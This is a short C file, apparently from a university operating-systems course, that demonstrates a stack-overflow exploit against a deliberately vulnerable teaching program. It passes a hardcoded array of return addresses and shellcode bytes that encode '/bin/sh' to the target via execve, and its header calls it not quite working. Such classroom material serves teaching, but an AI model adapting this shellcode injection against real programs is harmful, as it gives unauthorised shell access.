/* file: exploit.c
   ---------------
   author:  Ted Baker
   version: $Version$
   last modified by: $Author: cop4610 $ on: $Date: 2002/08/21 19:28:41 $
   purpose: exploit the program vulnerable.c

   attempted demonstration of linux/x86 stack-modification exploit
   derived from xterm.Xaw exploit  by alcuin - 5/4/98 - [ http://www.rootshell.com/ ] 

   not quite working (yet)

*/ 

#include <unistd.h> 
#include <stdio.h> 
#include <errno.h> 

#define EXEC_PROGRAM "/bin/ls"
#include "execwrapper.i"

#define SAFETY_MARGIN 50

char *arg[] = {"vulnerable", NULL, NULL};
char *env[] = {NULL};

/* values below captured from experiment4.c */

int payload[] = {
  0xbffffa78,
  0x4090b230,
  0x4202bd50,
  0x4211548a,
  0x4213030c,
  0x40013020,
  0xbffffa68,
  0xbffffa60,
  0xb0e58955,
  0x74123c56,
  0xe812b007,
  0xfffffff5,
  0xb0c0315e,
  0x89c60125,
  0xb0f789f3,
  0xb0c70108,
  0x89c60105,
  0x47f98937,
  0x30474747,
  0x890789c0,
  0xcd0bb0fa,
  0x69622f80,
  0x68732f6e,
  0x40010000
 };

int main (int argc, char **argv) { 
  fprintf (stderr, "executing ./vulnerable\n");
  arg[1] = (char *) payload;
  if (execve ("./vulnerable", arg, env) == -1) {
     fprintf (stderr, "errno = %d\n", errno);
     perror ("exec failed");
  }
  return 0;
}